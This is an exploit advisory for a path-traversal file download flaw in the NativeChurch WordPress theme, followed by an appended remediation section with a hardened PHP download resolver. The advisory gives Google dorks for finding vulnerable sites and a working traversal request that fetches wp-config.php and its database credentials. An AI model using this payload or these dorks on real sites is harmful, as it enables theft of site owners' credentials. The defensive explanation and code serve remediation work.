- ####################################################################
- # Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/02/2019
- # Vendor Homepage : themeforest.net
- # Software Information Link :
- themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
- # Software Affected Versions : WordPress From 3.9 to 5.0.x
- Compatible with Bootstrap 3.x - bbPress 2.5.x
- From WooCommerce 2.1.x To WooCommerce 3.4.x,
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
- inurl:''inurl:/wp-content/themes/NativeChurch/download/''
- # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
- CWE-23 [ Relative Path Traversal ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- NativeChurch is a powerful WordPress Theme designed & developed for Church,
- Charity, Non-Profit and Religious Websites and comes handy
- for Portfolio/Corporate Websites as well.
- ####################################################################
- # Impact :
- ***********
- * The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers
- download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
- An attacker can exploit this issue to download arbitrary files within the context
- of the web server process. Information obtained may aid in further attacks.
- Attackers can use a browser to exploit this issue.
- * The software uses external input to construct a pathname that should be within a
- restricted directory, but it does not properly neutralize sequences
- such as ".." that can resolve to a location that is outside of that directory.
- ####################################################################
- # Arbitrary File Download Exploit :
- ******************************
- /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
- # Example Information about MySQL WordPress Configuration File :
- ***********************************************************
- /** Name of the WordPress database. */
- define('DB_NAME',
- /** MySQL database user. */
- define('DB_USER',
- /** MySQL database password. */
- define('DB_PASSWORD',
- /** MySQL host address. */
- define('DB_HOST',
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
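
The Impact section above attributes the flaw to a pathname built from user input without neutralizing ".." sequences. As an added example (not code from the NativeChurch theme or from the advisory's author), this PHP function shows one way a download handler can confine a `file` parameter to its directory; `resolve_download`, the `downloads` directory, the extension allow-list and the temporary files are assumptions constructed for the illustration.

```php
<?php
// Hypothetical hardened resolver for a file-download endpoint.
// Not the theme's code: function name, directory layout and allow-list are assumptions.
function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; it returns false if the target is missing.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // The canonical path must still sit under the canonical base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Extension allow-list: source and configuration files are never served.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    return in_array($ext, ['pdf', 'mp3', 'jpg', 'png'], true) ? $target : null;
}

// Constructed demo: a temporary tree standing in for a site root.
$root = sys_get_temp_dir() . '/dl_demo_' . bin2hex(random_bytes(4));
mkdir("$root/downloads", 0700, true);
file_put_contents("$root/downloads/sample.pdf", '%PDF-1.4');
file_put_contents("$root/secret-config.php", "<?php // constructed\n");
foreach (['sample.pdf', '../secret-config.php', 'missing.pdf'] as $name) {
    $path = resolve_download("$root/downloads", $name);
    printf("%-24s => %s\n", $name, $path === null ? 'rejected' : 'served');
}
```

The containment check runs on the canonical path rather than on the raw string, so encoded or nested traversal sequences are judged by where they resolve, not by how they are spelled.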